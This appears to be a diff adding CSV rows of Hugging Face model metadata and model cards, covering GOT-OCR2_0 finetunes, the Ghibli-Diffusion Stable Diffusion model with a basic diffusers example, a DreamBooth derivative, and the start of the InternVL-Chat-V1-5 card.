---","{""id"": ""pranavdaware/web_ocr"", ""author"": ""pranavdaware"", ""sha"": ""1a22f882b761e45c1c660f4890af637462b392f2"", ""last_modified"": ""2024-10-10 12:30:14+00:00"", ""created_at"": ""2024-09-30 12:16:34+00:00"", ""private"": false, ""gated"": false, ""disabled"": false, ""downloads"": 5, ""downloads_all_time"": null, ""likes"": 0, ""library_name"": null, ""gguf"": null, ""inference"": null, ""inference_provider_mapping"": null, ""tags"": [""safetensors"", ""GOT"", ""image-to-text"", ""custom_code"", ""hi"", ""en"", ""base_model:stepfun-ai/GOT-OCR2_0"", ""base_model:finetune:stepfun-ai/GOT-OCR2_0"", ""license:apache-2.0"", ""region:us""], ""pipeline_tag"": ""image-to-text"", ""mask_token"": null, ""trending_score"": null, ""card_data"": ""base_model:\n- stepfun-ai/GOT-OCR2_0\nlanguage:\n- hi\n- en\nlicense: apache-2.0\nmetrics:\n- accuracy\npipeline_tag: image-to-text"", ""widget_data"": null, ""model_index"": null, ""config"": {""architectures"": [""GOTQwenForCausalLM""], ""auto_map"": {""AutoConfig"": ""modeling_GOT.GOTConfig"", ""AutoModel"": ""modeling_GOT.GOTQwenForCausalLM""}, ""model_type"": ""GOT"", ""tokenizer_config"": {""eos_token"": ""<|im_end|>"", ""pad_token"": ""<|endoftext|>""}}, ""transformers_info"": null, ""siblings"": [""RepoSibling(rfilename='.gitattributes', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='README.md', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='generation_config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='got_vision_b.py', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='modeling_GOT.py', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='qwen.tiktoken', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='render_tools.py', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='special_tokens_map.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='tokenization_qwen.py', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='tokenizer_config.json', size=None, blob_id=None, lfs=None)""], ""spaces"": [], ""safetensors"": {""parameters"": {""F32"": 560528640}, ""total"": 560528640}, ""security_repo_status"": null, ""xet_enabled"": null, ""lastModified"": ""2024-10-10 12:30:14+00:00"", ""cardData"": ""base_model:\n- stepfun-ai/GOT-OCR2_0\nlanguage:\n- hi\n- en\nlicense: apache-2.0\nmetrics:\n- accuracy\npipeline_tag: image-to-text"", ""transformersInfo"": null, ""_id"": ""66fa96a234ceaf45bd4449bf"", ""modelId"": ""pranavdaware/web_ocr"", ""usedStorage"": 2242169024}",1,,0,,0,,0,,0,huggingface/InferenceSupport/discussions/new?title=pranavdaware/web_ocr&description=React%20to%20this%20comment%20with%20an%20emoji%20to%20vote%20for%20%5Bpranavdaware%2Fweb_ocr%5D(%2Fpranavdaware%2Fweb_ocr)%20to%20be%20supported%20by%20Inference%20Providers.%0A%0A(optional)%20Which%20providers%20are%20you%20interested%20in%3F%20(Novita%2C%20Hyperbolic%2C%20Together%E2%80%A6)%0A,1
|
| 420 |
+
LuoKinging/learning-1,"---
|
| 421 |
+
license: mit
|
| 422 |
+
datasets:
|
| 423 |
+
- argilla/FinePersonas-v0.1
|
| 424 |
+
language:
|
| 425 |
+
- zh
|
| 426 |
+
metrics:
|
| 427 |
+
- accuracy
|
| 428 |
+
base_model:
|
| 429 |
+
- stepfun-ai/GOT-OCR2_0
|
| 430 |
+
new_version: black-forest-labs/FLUX.1-dev
|
| 431 |
+
pipeline_tag: token-classification
|
| 432 |
+
library_name: allennlp
|
| 433 |
+
tags:
|
| 434 |
+
- test
|
| 435 |
+
- luoking
|
| 436 |
+
---","{""id"": ""LuoKinging/learning-1"", ""author"": ""LuoKinging"", ""sha"": ""95d7d747c5aaee257334501b82f296469a8f4d9b"", ""last_modified"": ""2024-10-13 16:47:55+00:00"", ""created_at"": ""2024-10-13 16:26:44+00:00"", ""private"": false, ""gated"": false, ""disabled"": false, ""downloads"": 0, ""downloads_all_time"": null, ""likes"": 0, ""library_name"": ""allennlp"", ""gguf"": null, ""inference"": null, ""inference_provider_mapping"": null, ""tags"": [""allennlp"", ""test"", ""luoking"", ""token-classification"", ""zh"", ""dataset:argilla/FinePersonas-v0.1"", ""base_model:stepfun-ai/GOT-OCR2_0"", ""base_model:finetune:stepfun-ai/GOT-OCR2_0"", ""license:mit"", ""region:us""], ""pipeline_tag"": ""token-classification"", ""mask_token"": null, ""trending_score"": null, ""card_data"": ""base_model:\n- stepfun-ai/GOT-OCR2_0\ndatasets:\n- argilla/FinePersonas-v0.1\nlanguage:\n- zh\nlibrary_name: allennlp\nlicense: mit\nmetrics:\n- accuracy\npipeline_tag: token-classification\ntags:\n- test\n- luoking\nnew_version: black-forest-labs/FLUX.1-dev"", ""widget_data"": [{""text"": ""\u6211\u53eb\u6c83\u5c14\u592b\u5188\uff0c\u6211\u4f4f\u5728\u67cf\u6797\u3002""}, {""text"": ""\u6211\u53eb\u8428\u62c9\uff0c\u6211\u4f4f\u5728\u4f26\u6566\u3002""}, {""text"": ""\u6211\u53eb\u514b\u62c9\u62c9\uff0c\u6211\u4f4f\u5728\u52a0\u5dde\u4f2f\u514b\u5229\u3002""}], ""model_index"": null, ""config"": null, ""transformers_info"": null, ""siblings"": [""RepoSibling(rfilename='.gitattributes', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='README.md', size=None, blob_id=None, lfs=None)""], ""spaces"": [], ""safetensors"": null, ""security_repo_status"": null, ""xet_enabled"": null, ""lastModified"": ""2024-10-13 16:47:55+00:00"", ""cardData"": ""base_model:\n- stepfun-ai/GOT-OCR2_0\ndatasets:\n- argilla/FinePersonas-v0.1\nlanguage:\n- zh\nlibrary_name: allennlp\nlicense: mit\nmetrics:\n- accuracy\npipeline_tag: token-classification\ntags:\n- test\n- luoking\nnew_version: black-forest-labs/FLUX.1-dev"", ""transformersInfo"": null, ""_id"": ""670bf4c4e3d216b424a0e31a"", ""modelId"": ""LuoKinging/learning-1"", ""usedStorage"": 0}",1,,0,,0,,0,,0,huggingface/InferenceSupport/discussions/new?title=LuoKinging/learning-1&description=React%20to%20this%20comment%20with%20an%20emoji%20to%20vote%20for%20%5BLuoKinging%2Flearning-1%5D(%2FLuoKinging%2Flearning-1)%20to%20be%20supported%20by%20Inference%20Providers.%0A%0A(optional)%20Which%20providers%20are%20you%20interested%20in%3F%20(Novita%2C%20Hyperbolic%2C%20Together%E2%80%A6)%0A,1
|
Ghibli-Diffusion_finetunes_20250424_223250.csv_finetunes_20250424_223250.csv
ADDED
|
@@ -0,0 +1,99 @@
|
| 1 |
+
model_id,card,metadata,depth,children,children_count,adapters,adapters_count,quantized,quantized_count,merges,merges_count,spaces,spaces_count
|
| 2 |
+
nitrosocke/Ghibli-Diffusion,"---
|
| 3 |
+
language:
|
| 4 |
+
- en
|
| 5 |
+
license: creativeml-openrail-m
|
| 6 |
+
thumbnail: ""https://huggingface.co/nitrosocke/Ghibli-Diffusion/resolve/main/images/ghibli-diffusion-thumbnail.jpg""
|
| 7 |
+
tags:
|
| 8 |
+
- stable-diffusion
|
| 9 |
+
- text-to-image
|
| 10 |
+
- image-to-image
|
| 11 |
+
- diffusers
|
| 12 |
+
|
| 13 |
+
---
|
| 14 |
+
### Ghibli Diffusion
|
| 15 |
+
|
| 16 |
+
This is a fine-tuned Stable Diffusion model trained on images from modern anime feature films from Studio Ghibli.
|
| 17 |
+
Use the tokens **_ghibli style_** in your prompts for the effect.
|
| 18 |
+
|
| 19 |
+
**If you enjoy my work and want to test new models before release, please consider supporting me**
|
| 20 |
+
[](https://patreon.com/user?u=79196446)
|
| 21 |
+
|
| 22 |
+
**Characters rendered with the model:**
|
| 23 |
+

|
| 24 |
+
**Cars and Animals rendered with the model:**
|
| 25 |
+

|
| 26 |
+
**Landscapes rendered with the model:**
|
| 27 |
+

|
| 28 |
+
_ghibli style beautiful Caribbean beach tropical (sunset) - Negative prompt: soft blurry_
|
| 29 |
+

|
| 30 |
+
_ghibli style ice field white mountains ((northern lights)) starry sky low horizon - Negative prompt: soft blurry_
|
| 31 |
+
|
| 32 |
+
#### Prompt and settings for the Storm Trooper:
|
| 33 |
+
**ghibli style (storm trooper) Negative prompt: (bad anatomy)**
|
| 34 |
+
_Steps: 20, Sampler: DPM++ 2M Karras, CFG scale: 7, Seed: 3450349066, Size: 512x704_
|
| 35 |
+
|
| 36 |
+
#### Prompt and settings for the VW Beetle:
|
| 37 |
+
**ghibli style VW beetle Negative prompt: soft blurry**
|
| 38 |
+
_Steps: 30, Sampler: Euler a, CFG scale: 7, Seed: 1529856912, Size: 704x512_
|
| 39 |
+
|
| 40 |
+
This model was trained using the diffusers-based DreamBooth training by ShivamShrirao, with prior-preservation loss and the _train-text-encoder_ flag, for 15,000 steps.
|
| 41 |
+
|
| 42 |
+
<!-- ### Gradio
|
| 43 |
+
|
| 44 |
+
We support a [Gradio](https://github.com/gradio-app/gradio) Web UI to run Ghibli-Diffusion:
|
| 45 |
+
[](https://huggingface.co/spaces/nitrosocke/Ghibli-Diffusion-Demo)-->
|
| 46 |
+
|
| 47 |
+
### 🧨 Diffusers
|
| 48 |
+
|
| 49 |
+
This model can be used just like any other Stable Diffusion model. For more information,
|
| 50 |
+
please have a look at the [Stable Diffusion](https://huggingface.co/docs/diffusers/api/pipelines/stable_diffusion).
|
| 51 |
+
|
| 52 |
+
You can also export the model to [ONNX](https://huggingface.co/docs/diffusers/optimization/onnx), run it with [MPS](https://huggingface.co/docs/diffusers/optimization/mps) on Apple Silicon, and/or use FLAX/JAX; an MPS sketch follows the CUDA example below.
|
| 53 |
+
|
| 54 |
+
```python
|
| 55 |
+
from diffusers import StableDiffusionPipeline
|
| 56 |
+
import torch
|
| 57 |
+
|
| 58 |
+
model_id = ""nitrosocke/Ghibli-Diffusion""
|
| 59 |
+
pipe = StableDiffusionPipeline.from_pretrained(model_id, torch_dtype=torch.float16)
|
| 60 |
+
pipe = pipe.to(""cuda"")
|
| 61 |
+
|
| 62 |
+
prompt = ""ghibli style magical princess with golden hair""
|
| 63 |
+
image = pipe(prompt).images[0]
|
| 64 |
+
|
| 65 |
+
image.save(""./magical_princess.png"")
|
| 66 |
+
```
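
On Apple Silicon, the same pipeline can run on the MPS backend instead of CUDA. This is a minimal sketch, assuming a PyTorch build with MPS support; the prompt and output filename are illustrative:

```python
# Minimal MPS sketch (Apple Silicon); assumes torch was built with MPS support.
from diffusers import StableDiffusionPipeline
import torch

pipe = StableDiffusionPipeline.from_pretrained(
    'nitrosocke/Ghibli-Diffusion', torch_dtype=torch.float16)
pipe = pipe.to('mps')            # run on the Apple GPU instead of CUDA
pipe.enable_attention_slicing()  # reduces peak memory on MPS at a small speed cost

prompt = 'ghibli style mountain village at dusk'
image = pipe(prompt).images[0]
image.save('./ghibli_village.png')
```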
|
| 67 |
+
|
| 68 |
+
## License
|
| 69 |
+
|
| 70 |
+
This model is open access and available to all, with a CreativeML OpenRAIL-M license further specifying rights and usage.
|
| 71 |
+
The CreativeML OpenRAIL License specifies:
|
| 72 |
+
|
| 73 |
+
1. You can't use the model to deliberately produce or share illegal or harmful outputs or content
|
| 74 |
+
2. The authors claim no rights on the outputs you generate; you are free to use them, and you are accountable for their use, which must not go against the provisions set in the license
|
| 75 |
+
3. You may re-distribute the weights and use the model commercially and/or as a service. If you do, please be aware you have to include the same use restrictions as the ones in the license and share a copy of the CreativeML OpenRAIL-M to all your users (please read the license entirely and carefully)
|
| 76 |
+
[Please read the full license here](https://huggingface.co/spaces/CompVis/stable-diffusion-license)","{""id"": ""nitrosocke/Ghibli-Diffusion"", ""author"": ""nitrosocke"", ""sha"": ""7600fd7538c9030fb60fa7bca17bf048c86466b3"", ""last_modified"": ""2023-08-03 19:46:59+00:00"", ""created_at"": ""2022-11-18 15:50:51+00:00"", ""private"": false, ""gated"": false, ""disabled"": false, ""downloads"": 122591, ""downloads_all_time"": null, ""likes"": 760, ""library_name"": ""diffusers"", ""gguf"": null, ""inference"": null, ""inference_provider_mapping"": null, ""tags"": [""diffusers"", ""safetensors"", ""stable-diffusion"", ""text-to-image"", ""image-to-image"", ""en"", ""license:creativeml-openrail-m"", ""autotrain_compatible"", ""endpoints_compatible"", ""diffusers:StableDiffusionPipeline"", ""region:us""], ""pipeline_tag"": ""text-to-image"", ""mask_token"": null, ""trending_score"": null, ""card_data"": ""language:\n- en\nlicense: creativeml-openrail-m\ntags:\n- stable-diffusion\n- text-to-image\n- image-to-image\n- diffusers\nthumbnail: https://huggingface.co/nitrosocke/Ghibli-Diffusion/resolve/main/images/ghibli-diffusion-thumbnail.jpg"", ""widget_data"": null, ""model_index"": null, ""config"": {""diffusers"": {""_class_name"": ""StableDiffusionPipeline""}}, ""transformers_info"": null, ""siblings"": [""RepoSibling(rfilename='.gitattributes', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='README.md', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='feature_extractor/preprocessor_config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='ghibli-diffusion-v1.ckpt', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='images/ghibli-diffusion-samples-01s.jpg', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='images/ghibli-diffusion-samples-02s.jpg', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='images/ghibli-diffusion-samples-03s.jpg', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='images/ghibli-diffusion-samples-04s.jpg', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='images/ghibli-diffusion-thumbnail.jpg', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='images/test.txt', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model_index.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='safety_checker/config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='safety_checker/model.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='safety_checker/pytorch_model.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='scheduler/scheduler_config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='text_encoder/config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='text_encoder/model.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='text_encoder/pytorch_model.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='tokenizer/merges.txt', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='tokenizer/special_tokens_map.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='tokenizer/tokenizer_config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='tokenizer/vocab.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='unet/config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='unet/diffusion_pytorch_model.bin', size=None, 
blob_id=None, lfs=None)"", ""RepoSibling(rfilename='unet/diffusion_pytorch_model.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='vae/config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='vae/diffusion_pytorch_model.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='vae/diffusion_pytorch_model.safetensors', size=None, blob_id=None, lfs=None)""], ""spaces"": [""radames/Real-Time-Latent-Consistency-Model"", ""Yntec/ToyWorld"", ""radames/Real-Time-Latent-Consistency-Model-Text-To-Image"", ""r3gm/DiffuseCraft"", ""John6666/DiffuseCraftMod"", ""Yntec/PrintingPress"", ""radames/Real-Time-SD-Turbo"", ""radames/real-time-pix2pix-turbo"", ""John6666/votepurchase-multiple-model"", ""latent-consistency/Real-Time-LCM-ControlNet-Lora-SD1.5"", ""Nymbo/image_gen_supaqueue"", ""ennov8ion/3dart-Models"", ""fffiloni/ControlVideo"", ""phenixrhyder/NSFW-ToyWorld"", ""Yntec/blitz_diffusion"", ""sanaweb/text-to-image"", ""Vedits/6x_Image_diffusion"", ""John6666/Diffusion80XX4sg"", ""ennov8ion/comicbook-models"", ""John6666/PrintingPress4"", ""SUPERSHANKY/Finetuned_Diffusion_Max"", ""PeepDaSlan9/B2BMGMT_Diffusion60XX"", ""latent-consistency/Real-Time-LCM-Text-to-Image-Lora-SD1.5"", ""Daniela-C/6x_Image_diffusion"", ""phenixrhyder/PrintingPress"", ""John6666/hfd_test_nostopbutton"", ""allknowingroger/Image-Models-Test59"", ""Menyu/DiffuseCraftMod"", ""daniissac/ghibli"", ""mindtube/Diffusion50XX"", ""TheKitten/Fast-Images-Creature"", ""Nymbo/Diffusion80XX4sg"", ""kaleidoskop-hug/PrintingPress"", ""ennov8ion/stablediffusion-models"", ""John6666/ToyWorld4"", ""grzegorz2047/fast_diffusion"", ""Alfasign/dIFFU"", ""Nymbo/PrintingPress"", ""Rifd/Sdallmodels"", ""John6666/Diffusion80XX4g"", ""NativeAngels/HuggingfaceDiffusion"", ""IgorSense/Diffusion_Space2"", ""ennov8ion/Scifi-Models"", ""ennov8ion/semirealistic-models"", ""ennov8ion/FantasyArt-Models"", ""ennov8ion/dreamlike-models"", ""noes14155/img_All_models"", ""ennov8ion/500models"", ""AnimeStudio/anime-models"", ""John6666/Diffusion80XX4"", ""K00B404/HuggingfaceDiffusion_custom"", ""John6666/blitz_diffusion4"", ""John6666/blitz_diffusion_builtin"", ""bobber/DiffuseCraft"", ""chrisjayden/gh-diffusion"", ""akhaliq/Ghibli-Diffusion"", ""RhythmRemix14/PrintingPressDx"", ""sohoso/PrintingPress"", ""NativeAngels/ToyWorld"", ""Lwight/Ghibli-Diffusion"", ""Harshveer/Finetuned_Diffusion_Max"", ""mindtube/maximum_multiplier_places"", ""animeartstudio/AnimeArtmodels2"", ""animeartstudio/AnimeModels"", ""Yabo/ControlVideo"", ""Binettebob22/fast_diffusion2"", ""pikto/Elite-Scifi-Models"", ""PeepDaSlan9/B2BMGMT_nitrosocke-Ghibli-Diffusion"", ""PixelistStudio/3dart-Models"", ""devmiles/zexxiai"", ""Nymbo/Diffusion60XX"", ""multimodalart/Real-Time-Latent-SDXL-Lightning"", ""TheKitten/Images"", ""ennov8ion/anime-models"", ""jordonpeter01/Diffusion70"", ""VirtuRoa/ghibli"", ""catontheturntable/Ghibli-Diffusion"", ""herberthe/nitrosocke-Ghibli-Diffusion"", ""RedYan/nitrosocke-Ghibli-Diffusion"", ""bradarrML/Diffusion_Space"", ""koustubhavachat/Ghibli-Diffusion"", ""ygtrfed/pp-web-ui"", ""Xinxiang0820/nitrosocke-Ghibli-Diffusion"", ""ivanmeyer/Finetuned_Diffusion_Max"", ""Mileena/Diffusion_Space2-Styles"", ""ennov8ion/Landscapes-models"", ""GorroRojo/nitrosocke-Ghibli-Diffusion"", ""Shad0ws/ImageModelTestEnvironment"", ""sohoso/anime348756"", ""ucmisanddisinfo/thisApp"", ""johann22/chat-diffusion"", ""afasdfas/cringe_model"", ""K00B404/generate_many_models"", ""manivannan7gp/Words2Image"", 
""ennov8ion/art-models"", ""ennov8ion/photo-models"", ""ennov8ion/art-multi"", ""Festrcze/Real-Time-SD-Turbooooooo"", ""vih-v/x_mod"", ""John6666/testvp""], ""safetensors"": null, ""security_repo_status"": null, ""xet_enabled"": null, ""lastModified"": ""2023-08-03 19:46:59+00:00"", ""cardData"": ""language:\n- en\nlicense: creativeml-openrail-m\ntags:\n- stable-diffusion\n- text-to-image\n- image-to-image\n- diffusers\nthumbnail: https://huggingface.co/nitrosocke/Ghibli-Diffusion/resolve/main/images/ghibli-diffusion-thumbnail.jpg"", ""transformersInfo"": null, ""_id"": ""6377a9dbf5fe4a39f7839d40"", ""modelId"": ""nitrosocke/Ghibli-Diffusion"", ""usedStorage"": 20376154998}",0,https://huggingface.co/elanoqi/wb-ghibli-800,1,,0,https://huggingface.co/RanaLLC/Ghibli-Diffusion-onnx-fp16,1,https://huggingface.co/Yntec/Ghibli,1,"CompVis/stable-diffusion-license, Daniela-C/6x_Image_diffusion, John6666/DiffuseCraftMod, John6666/Diffusion80XX4sg, John6666/PrintingPress4, John6666/votepurchase-multiple-model, Nymbo/image_gen_supaqueue, PeepDaSlan9/B2BMGMT_Diffusion60XX, Yntec/PrintingPress, Yntec/ToyWorld, Yntec/blitz_diffusion, huggingface/InferenceSupport/discussions/new?title=nitrosocke/Ghibli-Diffusion&description=React%20to%20this%20comment%20with%20an%20emoji%20to%20vote%20for%20%5Bnitrosocke%2FGhibli-Diffusion%5D(%2Fnitrosocke%2FGhibli-Diffusion)%20to%20be%20supported%20by%20Inference%20Providers.%0A%0A(optional)%20Which%20providers%20are%20you%20interested%20in%3F%20(Novita%2C%20Hyperbolic%2C%20Together%E2%80%A6)%0A, phenixrhyder/NSFW-ToyWorld, r3gm/DiffuseCraft",14
|
| 77 |
+
elanoqi/wb-ghibli-800,"
|
| 78 |
+
---
|
| 79 |
+
license: creativeml-openrail-m
|
| 80 |
+
base_model: nitrosocke/Ghibli-Diffusion
|
| 81 |
+
instance_prompt: a photo of jksj waist bag
|
| 82 |
+
tags:
|
| 83 |
+
- stable-diffusion
|
| 84 |
+
- stable-diffusion-diffusers
|
| 85 |
+
- text-to-image
|
| 86 |
+
- diffusers
|
| 87 |
+
- dreambooth
|
| 88 |
+
inference: true
|
| 89 |
+
---
|
| 90 |
+
|
| 91 |
+
# DreamBooth - elanoqi/wb-ghibli-800
|
| 92 |
+
|
| 93 |
+
This is a DreamBooth model derived from nitrosocke/Ghibli-Diffusion. The weights were trained on 'a photo of jksj waist bag' using [DreamBooth](https://dreambooth.github.io/).
|
| 94 |
+
You can find some example images in the following.
|
| 95 |
+
|
| 96 |
+
|
| 97 |
+
|
| 98 |
+
DreamBooth for the text encoder was enabled: False.
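
For reference, a minimal diffusers inference sketch using the instance prompt above (the output filename is illustrative):

```python
import torch
from diffusers import StableDiffusionPipeline

pipe = StableDiffusionPipeline.from_pretrained(
    'elanoqi/wb-ghibli-800', torch_dtype=torch.float16).to('cuda')

# Prompt with the DreamBooth instance phrase the weights were trained on.
image = pipe('a photo of jksj waist bag').images[0]
image.save('./waist_bag.png')
```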
|
| 99 |
+
","{""id"": ""elanoqi/wb-ghibli-800"", ""author"": ""elanoqi"", ""sha"": ""d3daf31284f473d7cd9bc1fa78bdcd1c91c2fdef"", ""last_modified"": ""2023-10-11 09:48:59+00:00"", ""created_at"": ""2023-10-11 08:21:53+00:00"", ""private"": false, ""gated"": false, ""disabled"": false, ""downloads"": 8, ""downloads_all_time"": null, ""likes"": 0, ""library_name"": ""diffusers"", ""gguf"": null, ""inference"": null, ""inference_provider_mapping"": null, ""tags"": [""diffusers"", ""tensorboard"", ""safetensors"", ""stable-diffusion"", ""stable-diffusion-diffusers"", ""text-to-image"", ""dreambooth"", ""base_model:nitrosocke/Ghibli-Diffusion"", ""base_model:finetune:nitrosocke/Ghibli-Diffusion"", ""license:creativeml-openrail-m"", ""autotrain_compatible"", ""endpoints_compatible"", ""diffusers:StableDiffusionPipeline"", ""region:us""], ""pipeline_tag"": ""text-to-image"", ""mask_token"": null, ""trending_score"": null, ""card_data"": ""base_model: nitrosocke/Ghibli-Diffusion\nlicense: creativeml-openrail-m\ntags:\n- stable-diffusion\n- stable-diffusion-diffusers\n- text-to-image\n- diffusers\n- dreambooth\ninstance_prompt: a photo of jksj waist bag\ninference: true"", ""widget_data"": null, ""model_index"": null, ""config"": {""diffusers"": {""_class_name"": ""StableDiffusionPipeline""}}, ""transformers_info"": null, ""siblings"": [""RepoSibling(rfilename='.gitattributes', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='README.md', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='checkpoint-500/optimizer.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='checkpoint-500/random_states_0.pkl', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='checkpoint-500/scheduler.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='checkpoint-500/unet/config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='checkpoint-500/unet/diffusion_pytorch_model.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='feature_extractor/preprocessor_config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='logs/dreambooth/1697015792.502247/events.out.tfevents.1697015792.fd068d4ea563.890.1', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='logs/dreambooth/1697015792.5039868/hparams.yml', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='logs/dreambooth/events.out.tfevents.1697015792.fd068d4ea563.890.0', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model_index.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='safety_checker/config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='safety_checker/model.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='scheduler/scheduler_config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='text_encoder/config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='text_encoder/model.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='tokenizer/added_tokens.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='tokenizer/merges.txt', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='tokenizer/special_tokens_map.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='tokenizer/tokenizer_config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='tokenizer/vocab.json', size=None, blob_id=None, lfs=None)"", 
""RepoSibling(rfilename='unet/config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='unet/diffusion_pytorch_model.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='vae/config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='vae/diffusion_pytorch_model.safetensors', size=None, blob_id=None, lfs=None)""], ""spaces"": [], ""safetensors"": null, ""security_repo_status"": null, ""xet_enabled"": null, ""lastModified"": ""2023-10-11 09:48:59+00:00"", ""cardData"": ""base_model: nitrosocke/Ghibli-Diffusion\nlicense: creativeml-openrail-m\ntags:\n- stable-diffusion\n- stable-diffusion-diffusers\n- text-to-image\n- diffusers\n- dreambooth\ninstance_prompt: a photo of jksj waist bag\ninference: true"", ""transformersInfo"": null, ""_id"": ""65265b21d5a9686516d90167"", ""modelId"": ""elanoqi/wb-ghibli-800"", ""usedStorage"": 10644418147}",1,,0,,0,,0,,0,huggingface/InferenceSupport/discussions/new?title=elanoqi/wb-ghibli-800&description=React%20to%20this%20comment%20with%20an%20emoji%20to%20vote%20for%20%5Belanoqi%2Fwb-ghibli-800%5D(%2Felanoqi%2Fwb-ghibli-800)%20to%20be%20supported%20by%20Inference%20Providers.%0A%0A(optional)%20Which%20providers%20are%20you%20interested%20in%3F%20(Novita%2C%20Hyperbolic%2C%20Together%E2%80%A6)%0A,1
|
InternVL-Chat-V1-5_finetunes_20250426_014322.csv_finetunes_20250426_014322.csv
ADDED
|
@@ -0,0 +1,655 @@
|
| 1 |
+
model_id,card,metadata,depth,children,children_count,adapters,adapters_count,quantized,quantized_count,merges,merges_count,spaces,spaces_count
|
| 2 |
+
OpenGVLab/InternVL-Chat-V1-5,"---
|
| 3 |
+
license: mit
|
| 4 |
+
pipeline_tag: image-text-to-text
|
| 5 |
+
library_name: transformers
|
| 6 |
+
base_model:
|
| 7 |
+
- OpenGVLab/InternViT-6B-448px-V1-5
|
| 8 |
+
- internlm/internlm2-chat-20b
|
| 9 |
+
new_version: OpenGVLab/InternVL2_5-26B
|
| 10 |
+
base_model_relation: merge
|
| 11 |
+
language:
|
| 12 |
+
- multilingual
|
| 13 |
+
tags:
|
| 14 |
+
- internvl
|
| 15 |
+
- custom_code
|
| 16 |
+
---
|
| 17 |
+
|
| 18 |
+
# InternVL-Chat-V1-5
|
| 19 |
+
|
| 20 |
+
[\[📂 GitHub\]](https://github.com/OpenGVLab/InternVL) [\[📜 InternVL 1.0\]](https://huggingface.co/papers/2312.14238) [\[📜 InternVL 1.5\]](https://huggingface.co/papers/2404.16821) [\[📜 Mini-InternVL\]](https://arxiv.org/abs/2410.16261) [\[📜 InternVL 2.5\]](https://huggingface.co/papers/2412.05271)
|
| 21 |
+
|
| 22 |
+
[\[🆕 Blog\]](https://internvl.github.io/blog/) [\[🗨️ Chat Demo\]](https://internvl.opengvlab.com/) [\[🤗 HF Demo\]](https://huggingface.co/spaces/OpenGVLab/InternVL) [\[🚀 Quick Start\]](#quick-start) [\[📖 Documents\]](https://internvl.readthedocs.io/en/latest/)
|
| 23 |
+
|
| 24 |
+
## Introduction
|
| 25 |
+
|
| 26 |
+
<p align=""center"">
|
| 27 |
+
<img src=""https://cdn-uploads.huggingface.co/production/uploads/64119264f0f81eb569e0d569/D60YzQBIzvoCvLRp2gZ0A.jpeg"" alt=""Image Description"" width=""300"" height=""300"">
|
| 28 |
+
</p>
|
| 29 |
+
|
| 30 |
+
> _Two interns holding hands, symbolizing the integration of InternViT and InternLM._
|
| 31 |
+
|
| 32 |
+
We introduce InternVL 1.5, an open-source multimodal large language model (MLLM) to bridge the capability gap between open-source and proprietary commercial models in multimodal understanding.
|
| 33 |
+
|
| 34 |
+
